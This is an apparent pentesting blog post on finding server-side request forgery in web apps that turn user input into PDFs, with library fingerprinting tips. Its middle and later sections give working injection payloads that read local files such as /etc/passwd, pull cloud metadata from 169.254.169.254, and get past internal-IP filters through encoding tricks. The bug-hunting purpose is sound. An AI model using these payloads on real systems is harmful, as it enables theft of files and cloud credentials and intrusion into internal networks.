Breaking Down SSRF on PDF Generation: A Pentesting Guide

Published in InfoSec Write-ups, Jul 21, 2023 (5 min read)

Hello hackers, I hope you are all doing well and hunting lots of bugs and dollars!

Today’s article is about an approach to hunting SSRF, with a focus on the PDF generation side. Let’s dive into it!

What is Server-Side Request Forgery (SSRF)?

A server-side request forgery vulnerability occurs when an attacker can manipulate input to a web application so that the server issues a request to a resource of the attacker’s choosing. The attacker can then use this to make requests to internal systems or other external resources, potentially gaining access to sensitive data or even taking control of the server itself.

In layman’s terms, it is similar to CSRF, except that in SSRF the adversary forces the back-end server, rather than a victim’s browser, to perform actions on his or her behalf. This can be used to read or update internal resources from an external network.

An SSRF vulnerability can be exploited in a number of ways, such as gaining unauthorized access to internal network resources, stealing sensitive information, or performing a denial of service (DoS) attack.

How to hunt for SSRF

In a recent pentest, I came across an application that takes user input and generates a PDF from it. In my experience, PDF generators are often vulnerable somewhere.

PDF generation is a common task performed by web applications, and it sometimes requires the application to access resources outside of its environment. This includes resources on the local network as well as resources on the internet. An attacker may be able to manipulate user-supplied input to cause the PDF generation process to make unauthorized requests if the application does not properly validate and sanitize it.
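
To make the root cause concrete, here is a minimal Python sketch of how this kind of flaw tends to arise. The template, the function names, and the `name` field are all hypothetical and not taken from any real application. It only shows that input placed into HTML unescaped becomes markup, which an HTML-to-PDF renderer may then fetch.

```python
import html

# Hypothetical template that an application might hand to its HTML-to-PDF renderer.
TEMPLATE = "<html><body><h1>Invoice for {name}</h1></body></html>"


def build_html_unsafe(name: str) -> str:
    """Interpolate user input as-is: any tags in it become live markup."""
    return TEMPLATE.format(name=name)


def build_html_escaped(name: str) -> str:
    """Escape user input first, so tags are rendered as plain text."""
    return TEMPLATE.format(name=html.escape(name, quote=True))


payload = '<img src="http://yourserver.com/">'
print(build_html_unsafe(payload))   # the <img> tag survives and would be fetched
print(build_html_escaped(payload))  # the tag is neutralized to &lt;img ...&gt;
```

If the renderer receives the first output, it may request the image URL from the server’s own network position, which is the behaviour the rest of this article hunts for.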

You can have a look at the analysis below, which shows that even big tech companies do not always have good SSRF protection.

SSRF in the Wild: A totally unscientific analysis of those SSRFs found in the wild (medium.com)

Web applications commonly use PDF generation libraries to generate PDF documents. Pages that offer this feature usually let users enter data and then generate a PDF document from it. However, SSRF attacks can be launched if the PDF generation page does not properly validate user input.

Some of the most popular PDF generation libraries used in web applications are:

wkhtmltopdf: An open source command line tool that uses the WebKit rendering engine to convert HTML and CSS into PDF documents.
TCPDF: A PHP library for generating PDF documents that supports a wide range of features, including images, graphics, and encryption.
PDFKit: A JavaScript library for Node.js and the browser that builds PDF documents programmatically. It is not to be confused with the Ruby gem of the same name, which wraps wkhtmltopdf to convert HTML and CSS into PDF.
iText: A Java-based library for generating PDF documents that supports a range of features, including digital signatures and form filling.
FPDF: A PHP library for generating PDF documents that is lightweight and easy to use.

Before attempting to carry out an SSRF attack on a web application, it is important to identify the specific library being used for generating PDF documents. This is because different libraries may have varying approaches to handling user input, which can impact the kind of payload that an attacker can utilize in their attack. By comprehending the library’s user input handling mechanism, we can create a more targeted and efficient payload that is customized to the particular library.

Here are several ways to identify which library a web application is using to generate PDF documents:

Inspect the page source and look for references to specific PDF libraries in the application’s code or dependencies. For example, references to iText, PDFtk, or Apache PDFBox may indicate that the application is using one of them.
Use tools like Wappalyzer or BuiltWith to scan the web application and determine which libraries it is using.
Try to generate a PDF document through the web application and examine the generated file’s metadata. This can often reveal which library was used to create the PDF.
Analysing the JS files of a web application may help determine the PDF library being used. It may contain references to specific PDF libraries or plugins. These references can take the form of variable names, function names, or URLs that are used to load scripts from the library.
If you are performing white-box penetration testing, check the application’s documentation or ask the developers directly which libraries are being used for PDF generation.
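
The metadata check from the list above can be sketched in a few lines of Python. This is a rough heuristic, not a PDF parser: it assumes the `/Producer` and `/Creator` entries are stored as uncompressed literal strings without nested parentheses, which is not always the case (they may be hex-encoded, or sit inside compressed object streams or XMP). The function name and the sample bytes are made up for illustration.

```python
import re

# Matches literal-string entries such as "/Producer (Some Library 1.2)".
# Assumption: the value is uncompressed and contains no nested parentheses.
INFO_FIELD = re.compile(rb"/(Producer|Creator)\s*\(([^()]*)\)")


def pdf_generator_hints(data: bytes) -> dict[str, str]:
    """Return the first /Producer and /Creator values found in raw PDF bytes."""
    hints: dict[str, str] = {}
    for key, value in INFO_FIELD.findall(data):
        # Keep only the first occurrence of each key.
        hints.setdefault(key.decode("ascii"), value.decode("latin-1").strip())
    return hints


# Hand-written sample resembling an Info dictionary; not output from a real target.
sample = (
    b"%PDF-1.4\n1 0 obj\n"
    b"<< /Creator (wkhtmltopdf 0.12.6) /Producer (Qt 4.8.7) >>\n"
    b"endobj\n"
)
print(pdf_generator_hints(sample))
```

Against a real file you would pass the downloaded bytes, for example `pdf_generator_hints(open("generated.pdf", "rb").read())`, where `generated.pdf` is a placeholder name. If this returns nothing, a dedicated tool such as exiftool or pdfinfo is more reliable.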

Detection for SSRF

If you know which library a web application uses for PDF generation, you can search the internet for payloads specific to it. If the techniques above still do not reveal the library, I recommend a trial-and-error approach.

We’ll start by identifying whether the application has implemented proper input validation or sanitization. Whatever field is reflected in the generated PDF is a place to attempt injections, primarily HTML or CSS injection. You can manipulate not only the input field values but also the target parameter names, using a proxy tool such as Burp Suite or OWASP ZAP.
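
When several fields are reflected in the PDF, it helps to know which one triggered a callback. The sketch below is one possible way to do that, assuming you control a listener at `yourserver.com` and that the field names are URL-safe. The function name and the field names are hypothetical.

```python
import uuid


def build_probes(fields: list[str], callback_host: str) -> dict[str, str]:
    """Build one HTML injection probe per field, each tagged with a unique token."""
    probes: dict[str, str] = {}
    for field in fields:
        token = uuid.uuid4().hex[:12]  # random tag to correlate callbacks with fields
        probes[field] = f'<img src="http://{callback_host}/{field}-{token}.png">'
    return probes


# Example field names; replace them with the parameters you see in your proxy.
for field, payload in build_probes(["name", "address"], "yourserver.com").items():
    print(field, "->", payload)
```

A request for `/name-<token>.png` in the listener’s logs then indicates that the `name` field was rendered as HTML by the server-side generator.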

Once you’ve achieved HTML injection, you can often escalate it to XSS or SSRF and chain further vulnerabilities to increase the impact.

You can try the payloads below. If they don’t work, some kind of security protection may be in place, so look for alternative payloads and try those.

// Basic payloads

<img src="http://yourserver.com"/>
<link rel=attachment href="http://yourserver.com">
<script> document.write(window.location) </script>
<object data="file:///etc/passwd">
<portal src="file:///etc/passwd" id=portal>
<iframe src=file:///etc/passwd></iframe>
<embed src="file:///etc/passwd" width="400" height="400">
<style><iframe src="http://169.254.169.254/latest/meta-data/">
<img src='x' onerror='document.write("<iframe src=http://169.254.169.254/latest/user-data></iframe>")'/>
<meta http-equiv="refresh" content="0;url=http://169.254.169.254" />

// Read local files (try other protocols in place of file://)

<script>
// Request a local file and write its contents, base64-encoded, into the rendered page
var x = new XMLHttpRequest();
x.onload = function () { document.write(btoa(this.responseText)); };
x.open("GET", "file:///etc/passwd");
x.send();
</script>

// Other protocols

  dict://
  ssh://
  sftp://
  ldap://
  gopher://
  tftp://

If you try to retrieve cloud metadata using the payload below, it will most likely be blocked because internal IPs are filtered. In that case, you might try one of the methods listed below.

// Blocked

<iframe src="http://169.254.169.254/latest/user-data"></iframe>

// Bypasses

Decimal IP: http://2852039166/latest/meta-data/
IPv6 compressed: http://[::ffff:a9fe:a9fe]/latest/meta-data/
IPv6 expanded: http://[0:0:0:0:0:ffff:a9fe:a9fe]/latest/meta-data/
IPv4-mapped IPv6: http://[0:0:0:0:0:ffff:169.254.169.254]/latest/meta-data/

Dotted decimal with overflow: http://425.510.425.510/
Dotless decimal: http://2852039166/
Dotless decimal with overflow: http://7147006462/
Dotted hexadecimal: http://0xA9.0xFE.0xA9.0xFE/
Dotless hexadecimal: http://0xA9FEA9FE/
Dotless hexadecimal with overflow: http://0x41414141A9FEA9FE/
Dotted octal: http://0251.0376.0251.0376/
Dotted octal with padding: http://0251.00376.000251.0000376/
Mixed encoding (dotted octal + dotted decimal): http://0251.254.169.254
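
The encodings listed above are plain arithmetic on the four octets, so they can be derived for any IPv4 address. Here is a minimal Python sketch using the standard `ipaddress` module. The function name and dictionary keys are my own, and whether a given form is accepted depends entirely on the URL parser and HTTP client used by the target.

```python
import ipaddress


def ipv4_encodings(ip: str) -> dict[str, str]:
    """Return alternative textual encodings of an IPv4 address."""
    addr = ipaddress.IPv4Address(ip)
    n = int(addr)         # the address as a 32-bit integer
    octets = addr.packed  # the four octets as bytes
    return {
        "dotless_decimal": str(n),
        "dotless_decimal_overflow": str(n + 2**32),  # wraps back to n in 32 bits
        "dotted_decimal_overflow": ".".join(str(o + 256) for o in octets),
        "dotted_hex": ".".join(f"0x{o:02X}" for o in octets),
        "dotless_hex": f"0x{n:08X}",
        "dotted_octal": ".".join(f"0{o:o}" for o in octets),
        "ipv4_mapped_ipv6": f"[::ffff:{n >> 16:x}:{n & 0xFFFF:x}]",
    }


for name, value in ipv4_encodings("169.254.169.254").items():
    print(f"{name}: http://{value}/latest/meta-data/")
```

Running it for 169.254.169.254 reproduces the values in the list, such as 2852039166 and 0xA9FEA9FE, and the same function can be pointed at other internal addresses like 127.0.0.1.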

I hope you found this informative. If you have any questions or suggestions, reach out to me on Twitter; I’ll be happy to assist or learn from you.

Happy Hacking!

Twitter handle: https://twitter.com/Xch_eater